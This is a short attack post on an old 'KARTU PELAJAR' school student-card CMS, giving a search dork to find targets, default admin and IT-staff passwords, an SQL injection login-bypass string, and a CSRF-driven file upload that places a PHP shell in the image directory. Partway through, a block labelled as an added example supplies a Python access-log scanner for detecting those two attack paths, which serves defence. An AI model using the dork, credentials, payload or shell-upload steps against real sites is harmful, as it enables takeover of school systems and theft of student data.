Vulnerabilities in KARTU PELAJAR (old) CMS



[+] Author : ./meicookies, developed by Kuroilotuz

[+] Title : Vulnerabilities in KARTU PELAJAR CMS, old version

[+] Dork : "Silahkan Login Untuk Akses System." , intitle:KARTU PELAJAR

======================================

[!] Default u/p : admin/admin for the admin role and itstaf/itstaf for the IT STAF role

[+] Admin login bypass bug

use: ' or 1=1 limit 1 -- -+


[+] Arbitrary file upload with CSRF

[-] Exploit: trget.sch.id/dash_user/aksi/user_update.php

If the "Data Berhasil di Ubah" popup appears, it's vulnerable

[-] CSRF : http://kuroilotuz.site/csrf.php

POSTFILE : gambar

[?!] SHELL LOCATION : trget.sch.id/assets/img/user/"your shell.php"
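
For site operators, both paths named above leave traces in web-server access logs. The following is an added example, not part of the original advisory or of the CMS: it flags script files requested from the upload directory and POSTs to the update handler that did not originate from the site itself. The combined log format, the host `school.example`, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined log format: ip - - [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
UPLOAD_DIR = "/assets/img/user/"                 # upload directory named in the advisory
UPDATE_PATH = "/dash_user/aksi/user_update.php"  # upload handler named in the advisory
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)  # assumed extension list

SAMPLE_LOG = [  # constructed lines: documentation IP ranges, placeholder hosts
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /assets/img/user/avatar1.jpg HTTP/1.1" 200 5120 "https://school.example/dash_user/" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "POST /dash_user/aksi/user_update.php HTTP/1.1" 200 310 "https://other.example/form.html" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:01:30 +0000] "GET /assets/img/user/x.php?a=1 HTTP/1.1" 200 12 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "POST /dash_user/aksi/user_update.php HTTP/1.1" 200 310 "https://school.example/dash_user/profile.php" "Mozilla/5.0"',
]


def classify(line, site_host):
    """Return the list of findings for one access-log line (empty if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path = urlsplit(m["path"]).path  # drop the query string before matching
    findings = []
    # 1. A script-like name under the image directory means an upload was not filtered.
    if path.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path[len(UPLOAD_DIR):]):
        findings.append("script-in-upload-dir")
    # 2. A POST to the update handler with a missing or foreign Referer did not come
    #    from the site's own form, which is what a CSRF submission looks like.
    if m["method"] == "POST" and path == UPDATE_PATH:
        if urlsplit(m["referer"]).hostname != site_host:
            findings.append("cross-site-post-to-user-update")
    return findings


def scan(lines, site_host):
    """Map 1-based line numbers to findings for every line that matched a rule."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line, site_host))}


if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG, "school.example").items():
        print(lineno, ", ".join(findings))
```

A hit on the first rule warrants checking the upload directory on disk; the Referer rule is a triage heuristic, since some clients omit that header on legitimate requests.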


#Make them aware ;)



Just for education, all forms of damage / crime are not our responsibility!